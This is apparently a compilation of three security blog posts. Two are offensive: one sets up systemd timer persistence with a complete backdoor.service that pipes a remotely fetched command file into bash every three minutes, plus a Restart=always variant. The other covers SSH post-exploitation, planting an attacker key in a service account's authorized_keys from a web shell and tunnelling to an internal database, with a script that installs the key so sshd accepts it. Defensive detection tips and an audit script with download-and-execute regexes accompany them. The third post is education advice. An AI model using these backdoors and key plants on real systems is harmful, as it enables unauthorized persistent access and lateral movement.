Establishing Persistence with systemd.timers

With the push to convert all of our old init-style process managers to the new cutting-edge systemd comes a whole new set of security concerns. In several recent competitions, I was able to establish persistence with systemd.timer units. Timer units are systemd's replacement for cron jobs: a .timer unit activates a matching .service unit on a schedule, and they are normally used for housekeeping tasks and for service watchers that restart a service that has hung or crashed. We can take advantage of this built-in core functionality to establish root-level persistence that is scheduled and launched by PID 1 itself. As an added bonus, it is a bit more difficult to find than a crontab, and there are several tools that can convert existing crontabs to systemd.timers.

In order to take advantage of persistence with systemd.timers, we just need write access to the /etc/systemd/system/ or /usr/lib/systemd/system/ directory (/lib/systemd/system/ on some distributions), which normally means root. With such a user we can create a service unit file and a timer unit file. Once the files are created, we register the timer unit with systemd and it executes our service unit on the timer's schedule. Timer units can also be enabled so that systemd starts them at boot automatically, to maintain persistence through reboots. Note that a unit in /etc/systemd/system/ takes precedence over one of the same name in /usr/lib/systemd/system/, so a dropped unit can also quietly replace a legitimate one.

Example persistence with systemd.timers

To establish persistence with systemd.timers, we first need to create a service unit. In this case I created a file called /etc/systemd/system/backdoor.service, which connects to a web server, fetches a command file and pipes it into bash.

[Unit]
Description=Backdoor

[Service]
Type=simple
# ExecStart= is not run through a shell, so a bare "|" would be handed to
# curl as an argument; wrap the pipeline in sh -c to get the intended effect
ExecStart=/bin/sh -c 'curl --insecure https://127.0.0.1/cmd.txt | bash'

Next I created a timer unit that launches my backdoor.service every 3 minutes to execute my latest CnC commands. The following is the contents of the file /etc/systemd/system/backdoor.timer, which I used throughout the CCDC competitions.

[Unit]
Description=Runs backdoor every 3 mins

[Timer]
# first run 5 minutes after boot; OnUnitActiveSec= alone would never fire,
# because it is measured from the service's last activation
OnBootSec=5min
# then every 3 minutes after the service was last started
OnUnitActiveSec=3min
# optional: a timer defaults to the .service with the same name
Unit=backdoor.service

[Install]
WantedBy=multi-user.target

Once those two files are created within one of the systemd unit directories, we can simply establish the persistence by starting the timer unit. On older systemd versions run systemctl daemon-reload first so that the newly written unit files are picked up.

systemctl start backdoor.timer

Then, to ensure the timer is automatically started at boot, tell systemd to enable the timer unit at startup. This creates a symlink to the timer under /etc/systemd/system/multi-user.target.wants/, which is one more place a defender can look.

systemctl enable backdoor.timer

As far as I can tell from my research, no stock tooling flags these units as backdoors; systemd treats them like any other unit. They are not hidden, though: systemctl list-timers --all shows every timer systemd has loaded, systemctl list-unit-files --type=timer shows which ones are enabled, systemctl cat <unit> prints a unit file as loaded, and the unit files themselves carry a modification time. In the CCDC competition space, I highly recommend running a command like the following in a screen session to spot new or changed timers.

watch -d systemctl list-timers

Example persistence with a Single Service Unit

The alternative is a single service unit that uses Restart=always, so systemd relaunches it every time it exits, whatever the exit code. Below is an example of such a service unit file: it executes our CnC command, exits, and is restarted by systemd 3 minutes later. (The trailing exit 0 only matters if Restart=on-success is used instead of always.)

[Service]
Type=simple
# run through sh -c so the pipe and the trailing exit behave as intended
ExecStart=/bin/sh -c 'curl --insecure https://127.0.0.1/cmd.txt | bash; exit 0'
# relaunch whenever the process exits, 180 seconds after it does
Restart=always
RestartSec=180

[Install]
WantedBy=multi-user.target
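
Neither systemd nor the watch loop above tells you which timer or service is the backdoor, so here is an added example, supplied by the editor and not part of the original post, that scans unit directories for Exec*= lines that fetch and run remote content, the pattern shared by backdoor.service and the Restart=always variant. The functions, the regular expressions and the two sample unit files it writes are all assumptions made for illustration; the sample units are constructed, not taken from a real host. Run it as sh audit_units.sh /etc/systemd/system /usr/lib/systemd/system during a competition; with no arguments it exercises the constructed sample.

```sh
#!/bin/sh
# audit_units.sh: flag systemd units whose Exec*= lines download and execute
# remote content (curl/wget piped into a shell, sh -c wrapping a fetch, or
# anything run from a scratch directory).  Editor-added example; the pattern
# list below is an assumption and should be tuned for the hosts you defend.

# is_suspicious_exec LINE: 0 if the Exec*= line looks like download-and-execute
is_suspicious_exec() {
    printf '%s\n' "$1" | grep -Eq \
        -e '(curl|wget)[^|]*[|][[:space:]]*(ba|da)?sh' \
        -e '(ba|da)?sh[[:space:]]+-c[[:space:]]+.*(curl|wget)' \
        -e '(^|[^[:alnum:]_])/(tmp|var/tmp|dev/shm)/'
}

# audit_units DIR...: print "FILE: LINE" for every suspicious Exec*= line in
# the *.service and *.timer files directly under each DIR.  Returns 0 when
# nothing was flagged and 1 otherwise, so it can run from a timer of its own.
audit_units() {
    hits=0
    for dir in "$@"; do
        for f in "$dir"/*.service "$dir"/*.timer; do
            [ -f "$f" ] || continue
            # read in the current shell (no pipeline) so $hits survives the loop
            while IFS= read -r line || [ -n "$line" ]; do
                line=${line#"${line%%[![:space:]]*}"}   # drop leading whitespace
                case "$line" in
                    Exec*=*) ;;
                    *) continue ;;
                esac
                if is_suspicious_exec "$line"; then
                    printf '%s: %s\n' "$f" "$line"
                    hits=$((hits + 1))
                fi
            done < "$f"
        done
    done
    [ "$hits" -eq 0 ]
}

# recent_units DIR MINUTES: unit files under DIR modified in the last MINUTES
# minutes, a cheap way to spot a freshly dropped backdoor.timer.
recent_units() {
    find "$1" -maxdepth 1 \( -name '*.service' -o -name '*.timer' \) -mmin "-$2"
}

# write_sample_units DIR: two constructed unit files (not from any real host)
# so the scanner can be exercised offline: one backdoor, one legitimate unit.
write_sample_units() {
    cat > "$1/backdoor.service" <<'EOF'
[Unit]
Description=Backdoor

[Service]
Type=simple
ExecStart=/bin/sh -c 'curl --insecure https://127.0.0.1/cmd.txt | bash'
EOF
    cat > "$1/fstrim.service" <<'EOF'
[Unit]
Description=Discard unused blocks on filesystems from /etc/fstab

[Service]
Type=oneshot
ExecStart=/usr/sbin/fstrim --fstab --verbose --quiet-unsupported
EOF
}

# With directories on the command line, scan them; with none, demonstrate on
# the constructed sample (a hit is expected there).
if [ "$#" -gt 0 ]; then
    audit_units "$@"
else
    sample=$(mktemp -d)
    write_sample_units "$sample"
    audit_units "$sample" || echo "(hit expected: the sample contains backdoor.service)"
    rm -rf "$sample"
fi
```

The scan deliberately reads the unit files rather than asking systemctl, so it also catches a unit that has been written to disk but not yet started; pair it with recent_units /etc/systemd/system 30 in the same screen session as the watch loop to catch new drops between scans.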

For more detailed information see the full documentation at: https://www.freedesktop.org/software/systemd/man/ or through your local man pages.

So You Got a Shell: SSH for Linux Post Exploitation

So you worked hard to find that cool web application exploit and got a shell on the box. Many people not so familiar with the Linux operating system quickly find themselves throwing their hands in the air and asking: now what do I do? By popular demand, this is a list of some of my favorite SSH for Linux post exploitation techniques that I have used over and over in past Cyber Defense competitions and my career.

Note: I’m assuming that you will likely exploit a service level account, such as ftpd, www-data, ldapadmin, squid, apache or syslog, and not immediately have root level access on the system.

One of my overall favorites is utilizing SSH for Linux post exploitation, as a means of developing access to systems on the internal network and of maintaining access. Almost all Linux distros come with openssh-client baked in and many also have openssh-server set to run at startup by default. OpenSSH's config files ship with fairly basic security measures in place and expect system administrators to turn on the many additional hardening options that are available. Most simply don't bother. Additionally, /etc/ssh/ssh_config and /etc/ssh/sshd_config are world readable by default (only the host private keys in /etc/ssh/ are restricted). So start by just checking them out.

User$ cat /etc/ssh/ssh_config

User$ cat /etc/ssh/sshd_config

Within /etc/ssh/sshd_config the default configuration allows public key authentication with the following line (it is also the compiled-in default, so it applies even when the line is commented out).

PubkeyAuthentication yes

This line allows a client holding the matching private key to authenticate as a specified user. This is done by adding your public key to the .ssh/authorized_keys file under the user's home directory. sshd only honours that file when its default StrictModes check passes: the home directory, .ssh and authorized_keys must be owned by the user (or root) and must not be group or world writable, so 0700 on .ssh and 0600 on authorized_keys are the safe settings. Once added, you can simply ssh to the system using your private key while specifying the username.

Note: Most default system service accounts ship with /bin/false or /sbin/nologin as their login shell, which means sshd will not give you an interactive login as that user, even with a valid key. sshd itself only checks that the shell exists and is executable, which /sbin/nologin is; it is the shell that ends the session.

So you issued cat /etc/passwd, saw that your user has no login shell, and you say: Michael, this whole maintaining access with public keys in the authorized_keys file is useless to me. So how about another use of SSH for Linux post exploitation: using your user to port forward into the local network over ssh?

So you get a web shell using some fancy new WordPress vulnerability, cat out the wp-config.php file and see that the database isn't hosted on the local system. Now you have to pop another box to access that database, right? Wrong. You can forward a local port on your own machine to the MySQL port through the web server with ssh, using the following command.

ssh -L 9000:<mysql server ip>:3306 www-data@<web server ip>

So now maybe people are thinking: great, I have to have a shell again... but www-data has /sbin/nologin! That's fine, we don't need a shell. Just follow the steps above. Use your web shell from the WordPress vulnerability to run ssh-keygen as www-data, which creates the user's .ssh directory with the right permissions (this needs www-data's home directory, /var/www on Debian, to be writable by www-data, which is often the case when the web root has been chowned to it). Then simply cat your public key into .ssh/authorized_keys to give yourself a means of authentication. You may not be able to get a local shell, but you can still ssh port forward by telling ssh not to run a remote command or allocate a tty, with the following command from your own machine.

ssh -v -nNT -L 9000:<mysql server ip>:3306 www-data@<web server ip>

This creates an ssh tunnel that forwards everything sent to port 9000 on your own machine through the web server to the MySQL server on its default port. (A remote forward, ssh -R, is the mirror image: run from the web shell toward a host you control, it exposes the MySQL server on that host's port 9000 instead; run against localhost on the web server it only binds 127.0.0.1:9000 there, which nobody outside can reach unless sshd's GatewayPorts is enabled.) So simply point the mysql client at port 9000 and use the credentials from the wp-config.php file.

mysql -u wordpress -p -h 127.0.0.1 -P 9000

Profit!
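
The key-drop step above fails silently when sshd's StrictModes (the default) sees a group- or world-writable home directory, .ssh or authorized_keys, and from a web shell you rarely notice. As an added example, supplied by the editor and not part of the original post, the following script installs a public key for a service account with the modes sshd expects and then checks the same conditions sshd checks before honouring the key. The function names, the placeholder key string and the temporary home directory in the demo are assumptions made for illustration; it relies only on POSIX sh plus find -maxdepth, which GNU and BSD find both support.

```sh
#!/bin/sh
# Install a public key for a service account such as www-data and verify the
# conditions sshd's StrictModes imposes before it will honour the key.
# Editor-added example; the demo key below is a placeholder, not a real key.

# is_gw_writable PATH: 0 if PATH is group- or world-writable, which is what
# sshd (StrictModes yes) refuses for the home directory, .ssh and authorized_keys
is_gw_writable() {
    find "$1" -maxdepth 0 \( -perm -020 -o -perm -002 \) 2>/dev/null | grep -q .
}

# install_authorized_key HOME PUBKEY: create HOME/.ssh (0700) and append PUBKEY
# once to authorized_keys (0600).  Returns 0 on success, 1 on any write failure.
install_authorized_key() {
    home=$1; pubkey=$2
    ssh_dir="$home/.ssh"; ak="$ssh_dir/authorized_keys"
    mkdir -p "$ssh_dir" 2>/dev/null || return 1
    chmod 700 "$ssh_dir" || return 1
    # skip the append if the key is already present, so re-runs stay idempotent
    if ! { [ -f "$ak" ] && grep -qxF "$pubkey" "$ak"; }; then
        printf '%s\n' "$pubkey" >> "$ak" || return 1
    fi
    chmod 600 "$ak" || return 1
    # sshd also rejects a group/world-writable home directory
    chmod go-w "$home"
}

# check_key_install HOME PUBKEY: print the first StrictModes problem found and
# return 1, or return 0 when sshd would accept the key.
check_key_install() {
    home=$1; pubkey=$2
    ssh_dir="$home/.ssh"; ak="$ssh_dir/authorized_keys"
    [ -d "$home" ] || { echo "home directory $home does not exist"; return 1; }
    for p in "$home" "$ssh_dir" "$ak"; do
        [ -e "$p" ] || { echo "$p is missing"; return 1; }
        is_gw_writable "$p" && { echo "$p is group/world writable; sshd will ignore the key"; return 1; }
    done
    grep -qxF "$pubkey" "$ak" || { echo "key is not present in $ak"; return 1; }
    return 0
}

# Demo on a constructed home directory with a placeholder key string.  On a
# target you would run this as the service account from the web shell, e.g.
# install_authorized_key /var/www "$(cat attacker.pub)".
PUBKEY='ssh-ed25519 AAAA-PLACEHOLDER-NOT-A-REAL-KEY attacker@example'
demo_home=$(mktemp -d)
if install_authorized_key "$demo_home" "$PUBKEY" && check_key_install "$demo_home" "$PUBKEY"; then
    echo "key installed; from your own machine: ssh -nNT -L 9000:<mysql server ip>:3306 www-data@<web server ip>"
fi
rm -rf "$demo_home"
```

If check_key_install reports a writable home directory you cannot fix (say /var/www is 777 for the web app), the key will never be used unless an administrator has set StrictModes no; the -v on the ssh command line shows the rejected key as "Authentications that can continue" without ever reaching "Authenticated to", which is the symptom to recognise.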

If you have any questions or want to know more just leave a comment or hit me up on social media.

My Honest Advice About Information Security Education

Now that I am a security professional and mentor, there is one question that still haunts me to this day. It's that simple moment when an aspiring young hacker (formal use, as in someone who enjoys figuring out how things work) looks to the future and asks for advice in furthering their education. The question is normally placed in the form of "Where should I go to school?" or "What college do you recommend?". I hesitate to answer these types of questions, because honestly my answer would be none. I find it hard to bring myself to recommend any of the schools I've gone to or have heard of to an InfoSec geek like myself. In fact I wish someone would have sat me down a few years ago and told me the truth about the prospects for education. Instead, I got the same old sales pitches for degrees that serve all your needs from the big universities. So, for anyone out there who is looking for brutally honest advice on the topic of information security education, I offer up my experiences in clear text for your consumption.

The first and last piece of advice I would give anyone is that you will need to do a substantial amount of learning on your own time. I don't care what college one goes to, or what program they belong to, they will not cover the material you need to know to work in the field. Most of the schools I've heard of do not offer any classes in information security, and if they do, it's a theory class that goes to about the level of a CompTIA Security+ certification. I think there are two main causes of these issues, based upon the colleges I've attended. The first is fear: they are scared of teaching the "dark arts" to students, because of both the legal issues that exist and the fact that students may use their knowledge for unethical ends. The second is the sheer lack of student interest, accreditation, and standardization that has led to a truly sluggish development of InfoSec coursework. That being said, there has been a noticeable push by several government bodies to form a basis for preparing security professionals for the future. This effort, known as Centers of Academic Excellence in Information Security, is in its infancy and still only has the backing of a few large, slow-moving institutions. So needless to say, it will be quite a while before we see fully developed information security degrees. In fact, based on speaking with several universities, I don't expect to see a fully accredited Information Security Bachelor's degree from a top 10 school until around 2020.

That being said, there is a real need in the current education landscape to supplement your education with additional work outside the classroom. The good news for us InfoSec geeks is that there is a lot of free and cost-effective training out there. The bad news is that you will have to prove you were engaged in it and/or justify it to any future employer. This learning commonly takes place online and can be video lectures like those found on Udemy.com and coursera.org. Others are rather cost-effective courses taught online by security professionals like Georgia Weidman, Joseph McCray, and Marcus Carey. I also highly recommend going to as many InfoSec conferences as possible, as they are a wealth of information and networking opportunities for a future career. Many of these conferences, the BSides events for instance, are free of charge, and many others have limited student-rate tickets as well. Also be sure to get involved in as many of the InfoSec competitions as possible to brush up your skills. Some may require you to be a full-time student at an accredited university, but still do as many as possible. Some of the major competitions for college students are CCDC, CyberWars, and NCL.

The other huge source of knowledge is technical certifications. These certifications can be a great learning opportunity and great proof of knowledge to an employer. However, in the information security industry not all companies give certifications the same weight. Some may require you to have or acquire a certification, while others may not even give you a pat on the back for them. In fact, many certification exams have been getting easier and more expensive over the years as demand has gone up. This devalues the certification itself and makes the cost much higher. For this reason, I recommend not getting cert happy while in school. As a side bar, I will recommend taking all certifications for any courses that will give you credit for passing the certification exam itself. This will save you a significant amount of money and give you something else to really shine on a resume. There is nothing wrong with doing the coursework for a certification and explaining that to an employer. They will understand, and you will find that a lot of employers will pay for certifications once you are in the workforce. As such I recommend doing just that: if you take a course and like it, find the certification and study the material. Simply state that you completed the coursework on your resume instead of the certification itself and explain the cost barrier to any prospective employer. This makes a nice conversation piece during the interview process and will help with the cost. Just do not feel the need to go out and get all the certifications; they are rather costly to maintain and may not produce the desired result.

Now I would not necessarily say there is a requirement in this industry to go to a collegiate institution. However, from personal experience I will say many large corporations will require at least a 4 year degree before they will consider you. Most of the time, however, the hiring process comes down to what you have done in the past and how you present that information to a hiring manager. Nevertheless, if you are looking for a college or need to go, here are some helpful questions to find the right place.

  1. Does the college offer a course on open source software and operating systems (Linux)?

This question is where I think many colleges currently fall short. Most universities I talked to during my search for a school were all about teaching Windows, Cisco, and Java. These technologies may be the most common, but they will severely limit your abilities when it comes to a career in the field. I put Linux in as an example, because if they do not even teach an introduction to Linux you are going to be really hurting. The truth of the matter is most security professionals use Linux every day and develop their tools for it as well.

  2. How many courses do you have that relate to the security, integrity, confidentiality and availability of computer networks?

This question is almost self-explanatory; it seeks to drill down and ask how many courses you will get that are directly related to your field. This will hopefully give you some additional information about the types of courses you will be taking and how they might relate to your prospects for a career.

  3. Is there a student organization on campus that focuses on computing, security, InfoSec, or Cyber Defense? If so, do they engage in competitions?

It is very important to be involved with active student organizations that exist on a school's campus. In my experience these organizations offer more of a learning experience than most classes. If a school does not have any such organization, it most likely is not the school for you. If it does, try to set up a meeting with several of the members. It is just as important to make sure you will mesh with any groups that exist there. Also check and see what professional or national organizations meet on campus or nearby; these groups offer great networking opportunities and can be a good source of knowledge as well. Most importantly, figure out if any of the organizations participate in collegiate competitions. If they don't, check with the dean or a few professors about the policies on engaging in such events. You might find that some schools will not support these academic competitions, in which case the school is probably not a good choice.

  4. Is this school accredited, and do they do research in the realm of information security?

Once again this will really speak to the quality of any program that exists at the prospective institution. Just be sure to check that the school holds a current version of the accreditation they claim to have. If they are doing information security research, ask about the projects they are working on and who is involved. If it's a single grad student or a professor with an interest in security doing some research on the side, it might not be a good reason to go. Also be sure to check that the research is current and producing usable results; there is no reason to go to an institution with bad research practices.

  5. Are there any courses that require a certification for completion or follow a certification track?

As I stated earlier in my tangent about certifications, they are a double-edged sword. If the institution focuses too heavily on certifications it may not be the best choice. On the other hand, if they encourage and support their students in acquiring certifications, as opposed to requiring it, they may very well be a good choice. Be sure to ask if the school has a certification center on campus. If they do, be sure to ask which certification companies they are contracted with. Also ask if vouchers or reduced rates are available for students.

Once you have chosen a university or school, the next step is making the most out of the experience. Now there are several ways to maximize your learning, and I will continue to update this list with more over time, but here are my top few.

  1. Get involved with student organizations and always strive to make them that one step better.
  2. Try your best to pass your knowledge on to the other students and expect the same in return.
  3. Find the professors who encourage you to orient your assignments toward your prospective career and take as many classes with them as possible.
  4. If your professor does not allow you to orient your work or doesn’t let you do it your way (and you still fulfill the assignment criteria), do it anyway, and if issues arise go straight to the dean.
  5. Try to get local or regional security professionals to give a talk at your institution.
  6. Never forget to have fun or you will burn out.
  7. Find internship opportunities and do the work you love.